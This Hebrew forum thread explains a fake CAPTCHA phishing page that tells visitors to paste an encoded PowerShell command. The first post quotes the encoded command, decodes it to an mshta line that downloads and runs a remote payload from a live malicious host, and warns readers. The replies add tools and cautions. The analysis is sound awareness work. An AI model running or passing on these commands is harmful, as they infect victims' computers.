דילוג לתוכן
  • חוקי הפורום
  • פופולרי
  • לא נפתר
  • משתמשים
  • חיפוש גוגל בפורום
  • צור קשר
עיצובים
  • Light
  • Cerulean
  • Cosmo
  • Flatly
  • Journal
  • Litera
  • Lumen
  • Lux
  • Materia
  • Minty
  • Morph
  • Pulse
  • Sandstone
  • Simplex
  • Sketchy
  • Spacelab
  • United
  • Yeti
  • Zephyr
  • Dark
  • Cyborg
  • Darkly
  • Quartz
  • Slate
  • Solar
  • Superhero
  • Vapor

  • ברירת מחדל (ללא עיצוב (ברירת מחדל))
  • ללא עיצוב (ברירת מחדל)
כיווץ
לוגו מותג
  1. דף הבית
  2. מחשבים וטכנולוגיה
  3. מדריכים - מחשבים וטכנולוגיה
  4. הסבר | איך לקבל וירוס בצורה כל כך פשוטה וההסבר של התהליך

הסבר | איך לקבל וירוס בצורה כל כך פשוטה וההסבר של התהליך

מתוזמן נעוץ נעול הועבר מדריכים - מחשבים וטכנולוגיה
kingyos
3 פוסטים 3 כותבים 563 צפיות 6 עוקבים
  • מהישן לחדש
  • מהחדש לישן
  • הכי הרבה הצבעות
תגובה
  • תגובה כנושא
התחברו כדי לפרסם תגובה
נושא זה נמחק. רק משתמשים עם הרשאות מתאימות יוכלו לצפות בו.
  • KINGYOSK מנותק
    KINGYOSK מנותק
    KINGYOS
    כתב נערך לאחרונה על ידי KINGYOS
    #1

    היי חברים.
    יצא לי בימים האחרונים לראות קישור של אתר פישינג מתוחכם וחשבתי לשתף אתכם בשלבים של הוירוס איך הוא נכנס כל כך פשוט וגם ללמוד איך הדברים נעשים כדי להחכים לפעם הבאה.

    אז באמת פרסמתי לפני כמה זמן מדריך מקיף אודות הנושא החשוב מאוד ברשת של פישיניג:
    https://mitmachim.top/post/686876

    אבל באמת כמה שנכתוב לא נגיע לקצה של החומר הזה כי הוא כל כך גדוש ויש עוד הרבה מה ללמוד ותמיד יהיו כלים חדשים וסוגים שונים של פריצה למחשב.

    היום נדבר על הקישור הבא: (זהירות התוכן מכיל קובץ זדוני)
    https://bot-check3.b-cdn.net/captcha-verify-v8.html
    את הקישור הזה אפשר למצוא ברחבי הרשת ובדרך כלל למי שאין חוסם פרסומות אבל לא רק.

    האתר מבקש ממנו לאמת שאנחנו לא רובוט אז הוא מבקש שנעשה את מה שהוא מבקש כדי להוכיח את זה.

    834aca36-8c63-4359-8384-5598e0c7dbd3-image.png

    ddd99fcd-da6c-4938-b910-29526fccdb49-image.png


     

    מי שיודע אנגלית אז מבין שהוא מבקש ממך להפעיל את השורת הפקודה ואז לעשות הדבק של מה שיש לך ב- Clipboard ואז להפעיל.
    אז כמובן שזה מאוד סקרן אותי ועשיתי לפי ההוראות שלו וקבילתי את הקישור הבא: (זהירות התוכן מכיל קובץ זדוני)

    powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYwBsAGkAYwBrAHQAbwBnAG8ALgBjAGwAaQBjAGsALwBkAG8AdwBuAGwAbwBhAGQAcwAvAHQAcgBhADEAMAAiAA==
    
    

     

    אז מה יש לנו כאן?
    מדובר בפקודה של PowerShell מוצפנת שאמורה להפעיל משהו בצורה שלא אפשרית לראות מה אתה באמת מפעיל, הצפנה זו נועדה להסתיר את הפקודה המקורית, מה שהופך את הבנת מטרתה למסובכת יותר, וזה גם הסיבה שזה עלול להיות מאוד מוסכן שהרי אי אפשר לדעת מה היא מכילה.

    עכשיו נעבור לניתוח:

    • powershell.exe: זהו הקובץ הניתן להפעלה של PowerShell, שהוא מעין שורת פקודה מתקדמת של Windows.

    • -eC: זהו פקודה המורה ל-PowerShell לפעול במצב של ביצוע קוד מוצפן.

    • ואז יש את המחרוזת הארוכה המכילה את הקוד המוצפן עצמו, במקרה שלנו זה המחרוזת:

    bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYwBsAGkAYwBrAHQAbwBnAG8ALgBjAGwAaQBjAGsALwBkAG8AdwBuAGwAbwBhAGQAcwAvAHQAcgBhADEAMAAiAA==
    

    בשביל לגלות מה התוכן המוצפן צריך אלגוריתם הצפנה ספציפי אשר אינו מצוין בפקודה.

    סוגי הצפנה נפוצים ב-PowerShell:

    Base64: שיטה נפוצה להצפנת נתונים, אך היא למעשה רק שיטה לקידוד בינארי לטקסט ASCII. היא אינה מספקת אבטחה אמיתית.

    ConvertTo-SecureString: פקודה ב-PowerShell המאפשרת ליצור מחרוזות מאובטחות, אך גם היא דורשת מפתח לפענוח.

    אז לקחתי את המחרוזת למעלה והכנסתי לאתרי פיענוח Base64 (יש הרבה ברשת) וקיבלתי את התוצאה הבאה:
    https://www.base64decode.org/

    afe745ee-0c2f-453c-b8b0-29ee46206520-image.png

     

    https://he.sharpcoderblog.com/blog/base64-decode-online#google_vignette
    f47f9d76-aa18-4027-9c4d-d2f32189163e-image.png

     

    אפשר לראות שהוא הצליח לפענח את המחרוזת וקבילתי את הקישור הבא: (זהירות התוכן מכיל קובץ זדוני)

    mshta "https://clicktogo.click/downloads/tra10"
    

    עכשיו תשאלו אותי מה הבעיה להוריד תוכנה ברשת? הרי אני לא מפעיל אותה במחשב אז מה הבעיה?
    שאלה מצוינת ובדיוק בגלל זה יוצר הקוד הזדוני חשב על זה והכניס את הפקודה mshta לפני הקישור
    מה זה אומר?
    mshta היא קיצור של "Microsoft HTML Application Host". זהו כלי שמשמש להפעלת קבצי HTML כאילו היו יישומים עצמאיים. הוא מאפשר להטמיע בתוך קבצי HTML שפות תסריט כמו VBScript ו-JScript, מה שהופך אותו לכלי רב-עוצמה לפיתוח יישומים פשוטים.
    אז אם אני מפעיל את הפקודה למעלה במחשב פירושה שהמחשב ינסה לפתוח את כתובת האינטרנט הזו באמצעות mshta. כתוצאה מכך, הדפדפן ינסה להוריד את הקובץ הנמצא בכתובת הזו ולהפעיל אותו כאילו היה יישום HTML.

    מה יכול לקרות כשמפעילים פקודה כזו?

    הפעלת יישום: אם הקובץ בכתובת הוא קובץ HTML תקין עם קוד VBScript או JScript, הוא יופעל ויבצע את הפעולות שכתובות בקוד.
    הורדת תוכנה: הקובץ יכול להוריד ולהתקין תוכנות נוספות למחשב.
    הפעלת תוכנה זדונית: אם הקובץ מכיל קוד זדוני, הוא יכול לפגוע במחשב שלך, לגנוב מידע או להתקין תוכנות ריגול.

    בקיצור ממש ממש לא מומלץ לנסות את זה ושומר נפשו ירחק מהם.

    לסיכום:
    אי אפשר לדעת איך אתה יכול לקבל וירוס אבל שים לב מה אתה מפעיל ברשת ואיזה פקודה אתה עושה לפני שיהיה מאוחר מדי.

    לצפייה במדריכים והתוכנות שפרסמתי לחצו כאן.
    לתגית שלי לחצו כאן.
    אפשר לדבר איתי:
    kingyosforums@gmail.com

    מ מישהו12מ 2 תגובות תגובה אחרונה
    31
    • KINGYOSK KINGYOS

      היי חברים.
      יצא לי בימים האחרונים לראות קישור של אתר פישינג מתוחכם וחשבתי לשתף אתכם בשלבים של הוירוס איך הוא נכנס כל כך פשוט וגם ללמוד איך הדברים נעשים כדי להחכים לפעם הבאה.

      אז באמת פרסמתי לפני כמה זמן מדריך מקיף אודות הנושא החשוב מאוד ברשת של פישיניג:
      https://mitmachim.top/post/686876

      אבל באמת כמה שנכתוב לא נגיע לקצה של החומר הזה כי הוא כל כך גדוש ויש עוד הרבה מה ללמוד ותמיד יהיו כלים חדשים וסוגים שונים של פריצה למחשב.

      היום נדבר על הקישור הבא: (זהירות התוכן מכיל קובץ זדוני)
      https://bot-check3.b-cdn.net/captcha-verify-v8.html
      את הקישור הזה אפשר למצוא ברחבי הרשת ובדרך כלל למי שאין חוסם פרסומות אבל לא רק.

      האתר מבקש ממנו לאמת שאנחנו לא רובוט אז הוא מבקש שנעשה את מה שהוא מבקש כדי להוכיח את זה.

      834aca36-8c63-4359-8384-5598e0c7dbd3-image.png

      ddd99fcd-da6c-4938-b910-29526fccdb49-image.png


       

      מי שיודע אנגלית אז מבין שהוא מבקש ממך להפעיל את השורת הפקודה ואז לעשות הדבק של מה שיש לך ב- Clipboard ואז להפעיל.
      אז כמובן שזה מאוד סקרן אותי ועשיתי לפי ההוראות שלו וקבילתי את הקישור הבא: (זהירות התוכן מכיל קובץ זדוני)

      powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYwBsAGkAYwBrAHQAbwBnAG8ALgBjAGwAaQBjAGsALwBkAG8AdwBuAGwAbwBhAGQAcwAvAHQAcgBhADEAMAAiAA==
      
      

       

      אז מה יש לנו כאן?
      מדובר בפקודה של PowerShell מוצפנת שאמורה להפעיל משהו בצורה שלא אפשרית לראות מה אתה באמת מפעיל, הצפנה זו נועדה להסתיר את הפקודה המקורית, מה שהופך את הבנת מטרתה למסובכת יותר, וזה גם הסיבה שזה עלול להיות מאוד מוסכן שהרי אי אפשר לדעת מה היא מכילה.

      עכשיו נעבור לניתוח:

      • powershell.exe: זהו הקובץ הניתן להפעלה של PowerShell, שהוא מעין שורת פקודה מתקדמת של Windows.

      • -eC: זהו פקודה המורה ל-PowerShell לפעול במצב של ביצוע קוד מוצפן.

      • ואז יש את המחרוזת הארוכה המכילה את הקוד המוצפן עצמו, במקרה שלנו זה המחרוזת:

      bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYwBsAGkAYwBrAHQAbwBnAG8ALgBjAGwAaQBjAGsALwBkAG8AdwBuAGwAbwBhAGQAcwAvAHQAcgBhADEAMAAiAA==
      

      בשביל לגלות מה התוכן המוצפן צריך אלגוריתם הצפנה ספציפי אשר אינו מצוין בפקודה.

      סוגי הצפנה נפוצים ב-PowerShell:

      Base64: שיטה נפוצה להצפנת נתונים, אך היא למעשה רק שיטה לקידוד בינארי לטקסט ASCII. היא אינה מספקת אבטחה אמיתית.

      ConvertTo-SecureString: פקודה ב-PowerShell המאפשרת ליצור מחרוזות מאובטחות, אך גם היא דורשת מפתח לפענוח.

      אז לקחתי את המחרוזת למעלה והכנסתי לאתרי פיענוח Base64 (יש הרבה ברשת) וקיבלתי את התוצאה הבאה:
      https://www.base64decode.org/

      afe745ee-0c2f-453c-b8b0-29ee46206520-image.png

       

      https://he.sharpcoderblog.com/blog/base64-decode-online#google_vignette
      f47f9d76-aa18-4027-9c4d-d2f32189163e-image.png

       

      אפשר לראות שהוא הצליח לפענח את המחרוזת וקבילתי את הקישור הבא: (זהירות התוכן מכיל קובץ זדוני)

      mshta "https://clicktogo.click/downloads/tra10"
      

      עכשיו תשאלו אותי מה הבעיה להוריד תוכנה ברשת? הרי אני לא מפעיל אותה במחשב אז מה הבעיה?
      שאלה מצוינת ובדיוק בגלל זה יוצר הקוד הזדוני חשב על זה והכניס את הפקודה mshta לפני הקישור
      מה זה אומר?
      mshta היא קיצור של "Microsoft HTML Application Host". זהו כלי שמשמש להפעלת קבצי HTML כאילו היו יישומים עצמאיים. הוא מאפשר להטמיע בתוך קבצי HTML שפות תסריט כמו VBScript ו-JScript, מה שהופך אותו לכלי רב-עוצמה לפיתוח יישומים פשוטים.
      אז אם אני מפעיל את הפקודה למעלה במחשב פירושה שהמחשב ינסה לפתוח את כתובת האינטרנט הזו באמצעות mshta. כתוצאה מכך, הדפדפן ינסה להוריד את הקובץ הנמצא בכתובת הזו ולהפעיל אותו כאילו היה יישום HTML.

      מה יכול לקרות כשמפעילים פקודה כזו?

      הפעלת יישום: אם הקובץ בכתובת הוא קובץ HTML תקין עם קוד VBScript או JScript, הוא יופעל ויבצע את הפעולות שכתובות בקוד.
      הורדת תוכנה: הקובץ יכול להוריד ולהתקין תוכנות נוספות למחשב.
      הפעלת תוכנה זדונית: אם הקובץ מכיל קוד זדוני, הוא יכול לפגוע במחשב שלך, לגנוב מידע או להתקין תוכנות ריגול.

      בקיצור ממש ממש לא מומלץ לנסות את זה ושומר נפשו ירחק מהם.

      לסיכום:
      אי אפשר לדעת איך אתה יכול לקבל וירוס אבל שים לב מה אתה מפעיל ברשת ואיזה פקודה אתה עושה לפני שיהיה מאוחר מדי.

      מ מנותק
      מ מנותק
      משחזר מידע
      כתב נערך לאחרונה על ידי משחזר מידע
      #2

      @KINGYOS
      וכאן יש לך מה זה עושה


      הפעלת ניהול דיסקים דרך הקובץ המצורף

      Hex editor חינמי

      תגובה 1 תגובה אחרונה
      7
      • KINGYOSK KINGYOS

        היי חברים.
        יצא לי בימים האחרונים לראות קישור של אתר פישינג מתוחכם וחשבתי לשתף אתכם בשלבים של הוירוס איך הוא נכנס כל כך פשוט וגם ללמוד איך הדברים נעשים כדי להחכים לפעם הבאה.

        אז באמת פרסמתי לפני כמה זמן מדריך מקיף אודות הנושא החשוב מאוד ברשת של פישיניג:
        https://mitmachim.top/post/686876

        אבל באמת כמה שנכתוב לא נגיע לקצה של החומר הזה כי הוא כל כך גדוש ויש עוד הרבה מה ללמוד ותמיד יהיו כלים חדשים וסוגים שונים של פריצה למחשב.

        היום נדבר על הקישור הבא: (זהירות התוכן מכיל קובץ זדוני)
        https://bot-check3.b-cdn.net/captcha-verify-v8.html
        את הקישור הזה אפשר למצוא ברחבי הרשת ובדרך כלל למי שאין חוסם פרסומות אבל לא רק.

        האתר מבקש ממנו לאמת שאנחנו לא רובוט אז הוא מבקש שנעשה את מה שהוא מבקש כדי להוכיח את זה.

        834aca36-8c63-4359-8384-5598e0c7dbd3-image.png

        ddd99fcd-da6c-4938-b910-29526fccdb49-image.png


         

        מי שיודע אנגלית אז מבין שהוא מבקש ממך להפעיל את השורת הפקודה ואז לעשות הדבק של מה שיש לך ב- Clipboard ואז להפעיל.
        אז כמובן שזה מאוד סקרן אותי ועשיתי לפי ההוראות שלו וקבילתי את הקישור הבא: (זהירות התוכן מכיל קובץ זדוני)

        powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYwBsAGkAYwBrAHQAbwBnAG8ALgBjAGwAaQBjAGsALwBkAG8AdwBuAGwAbwBhAGQAcwAvAHQAcgBhADEAMAAiAA==
        
        

         

        אז מה יש לנו כאן?
        מדובר בפקודה של PowerShell מוצפנת שאמורה להפעיל משהו בצורה שלא אפשרית לראות מה אתה באמת מפעיל, הצפנה זו נועדה להסתיר את הפקודה המקורית, מה שהופך את הבנת מטרתה למסובכת יותר, וזה גם הסיבה שזה עלול להיות מאוד מוסכן שהרי אי אפשר לדעת מה היא מכילה.

        עכשיו נעבור לניתוח:

        • powershell.exe: זהו הקובץ הניתן להפעלה של PowerShell, שהוא מעין שורת פקודה מתקדמת של Windows.

        • -eC: זהו פקודה המורה ל-PowerShell לפעול במצב של ביצוע קוד מוצפן.

        • ואז יש את המחרוזת הארוכה המכילה את הקוד המוצפן עצמו, במקרה שלנו זה המחרוזת:

        bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYwBsAGkAYwBrAHQAbwBnAG8ALgBjAGwAaQBjAGsALwBkAG8AdwBuAGwAbwBhAGQAcwAvAHQAcgBhADEAMAAiAA==
        

        בשביל לגלות מה התוכן המוצפן צריך אלגוריתם הצפנה ספציפי אשר אינו מצוין בפקודה.

        סוגי הצפנה נפוצים ב-PowerShell:

        Base64: שיטה נפוצה להצפנת נתונים, אך היא למעשה רק שיטה לקידוד בינארי לטקסט ASCII. היא אינה מספקת אבטחה אמיתית.

        ConvertTo-SecureString: פקודה ב-PowerShell המאפשרת ליצור מחרוזות מאובטחות, אך גם היא דורשת מפתח לפענוח.

        אז לקחתי את המחרוזת למעלה והכנסתי לאתרי פיענוח Base64 (יש הרבה ברשת) וקיבלתי את התוצאה הבאה:
        https://www.base64decode.org/

        afe745ee-0c2f-453c-b8b0-29ee46206520-image.png

         

        https://he.sharpcoderblog.com/blog/base64-decode-online#google_vignette
        f47f9d76-aa18-4027-9c4d-d2f32189163e-image.png

         

        אפשר לראות שהוא הצליח לפענח את המחרוזת וקבילתי את הקישור הבא: (זהירות התוכן מכיל קובץ זדוני)

        mshta "https://clicktogo.click/downloads/tra10"
        

        עכשיו תשאלו אותי מה הבעיה להוריד תוכנה ברשת? הרי אני לא מפעיל אותה במחשב אז מה הבעיה?
        שאלה מצוינת ובדיוק בגלל זה יוצר הקוד הזדוני חשב על זה והכניס את הפקודה mshta לפני הקישור
        מה זה אומר?
        mshta היא קיצור של "Microsoft HTML Application Host". זהו כלי שמשמש להפעלת קבצי HTML כאילו היו יישומים עצמאיים. הוא מאפשר להטמיע בתוך קבצי HTML שפות תסריט כמו VBScript ו-JScript, מה שהופך אותו לכלי רב-עוצמה לפיתוח יישומים פשוטים.
        אז אם אני מפעיל את הפקודה למעלה במחשב פירושה שהמחשב ינסה לפתוח את כתובת האינטרנט הזו באמצעות mshta. כתוצאה מכך, הדפדפן ינסה להוריד את הקובץ הנמצא בכתובת הזו ולהפעיל אותו כאילו היה יישום HTML.

        מה יכול לקרות כשמפעילים פקודה כזו?

        הפעלת יישום: אם הקובץ בכתובת הוא קובץ HTML תקין עם קוד VBScript או JScript, הוא יופעל ויבצע את הפעולות שכתובות בקוד.
        הורדת תוכנה: הקובץ יכול להוריד ולהתקין תוכנות נוספות למחשב.
        הפעלת תוכנה זדונית: אם הקובץ מכיל קוד זדוני, הוא יכול לפגוע במחשב שלך, לגנוב מידע או להתקין תוכנות ריגול.

        בקיצור ממש ממש לא מומלץ לנסות את זה ושומר נפשו ירחק מהם.

        לסיכום:
        אי אפשר לדעת איך אתה יכול לקבל וירוס אבל שים לב מה אתה מפעיל ברשת ואיזה פקודה אתה עושה לפני שיהיה מאוחר מדי.

        מישהו12מ מנותק
        מישהו12מ מנותק
        מישהו12
        מדריכים
        כתב נערך לאחרונה על ידי
        #3

        @KINGYOS כתב בהסבר | איך לקבל וירוס בצורה כל כך פשוטה וההסבר של התהליך:

        אי אפשר לדעת איך אתה יכול לקבל וירוס

        מה שכן אפשר לדעת, שהבדיקה ההיא של "אני לא רובוט" חשודה ביותר.
        אין שום סיבה בעולם שיבקשו ממך להריץ פקודה למחשב כאימות... זה צועק "וירוס".

        הבלוג שלי
        https://aiv-dev.com/he-IL/

        תגובה 1 תגובה אחרונה
        9
        • KINGYOSK KINGYOS התייחס לנושא זה

        • התחברות

        • אין לך חשבון עדיין? הרשמה

        • התחברו או הירשמו כדי לחפש.
        • פוסט ראשון
          פוסט אחרון
        0
        • חוקי הפורום
        • פופולרי
        • לא נפתר
        • משתמשים
        • חיפוש גוגל בפורום
        • צור קשר